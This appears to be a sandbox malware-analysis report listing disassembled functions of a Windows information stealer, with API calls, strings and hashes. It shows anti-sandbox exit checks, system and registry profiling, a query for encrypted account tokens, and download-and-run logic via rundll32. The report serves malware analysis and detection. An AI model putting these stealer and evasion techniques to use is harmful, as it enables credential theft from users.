GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

C, xrefs: 004141E9
\, xrefs: 004141FD
:, xrefs: 004141F9

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,042F6AA8,00000000,?,0041D774,00000000,?,00000000,00000000,?,042F6A78), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

@, xrefs: 0041498A
%d MB, xrefs: 004149E0

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,042F0A68), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

AccountTokens, xrefs: 0040B319
AccountTokens, xrefs: 0040B28A
AccountId, xrefs: 0040B472
SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 0dfaf801bfec00c2bc2ebe50847e2035671af3c91b46ad4f7e3196e360e0a54e
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: 0dfaf801bfec00c2bc2ebe50847e2035671af3c91b46ad4f7e3196e360e0a54e
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2910), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D29A0), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2958), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2940), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D2970), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042EEF30), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D3F78), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D41D8), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F0638), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F0530), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F05F0), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F05D8), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042D3FF8), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,042F03F8), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

GetUserDefaultLangID.KERNEL32 ref: 004136E6

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042F0928,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,042EEF50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: c68b81ff4b05b1a0ab45a4ca2bc7cc5aeaafa69d51f1164b6b186f3869907372
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: c68b81ff4b05b1a0ab45a4ca2bc7cc5aeaafa69d51f1164b6b186f3869907372
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,042F6B08,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,042F68C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,042F7660,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,042F83B0,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,042F8410), ref: 00411E2B

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: bd2aad392ddce8e509498b497cec8cbdfa1914d96ed247c75ddc5ef3103a8c15
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: bd2aad392ddce8e509498b497cec8cbdfa1914d96ed247c75ddc5ef3103a8c15
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

"" , xrefs: 004111DC
.dll, xrefs: 00411054
<, xrefs: 004112AC
C:\Windows\system32\rundll32.dll, xrefs: 004110BF

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 258d4ebfc66ed96dd19087c235080dee1f5f1bf45f7a0d4999c098e0e1a92ace
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 258d4ebfc66ed96dd19087c235080dee1f5f1bf45f7a0d4999c098e0e1a92ace
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,042F6CE8), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,042EF930), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,042F7580), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
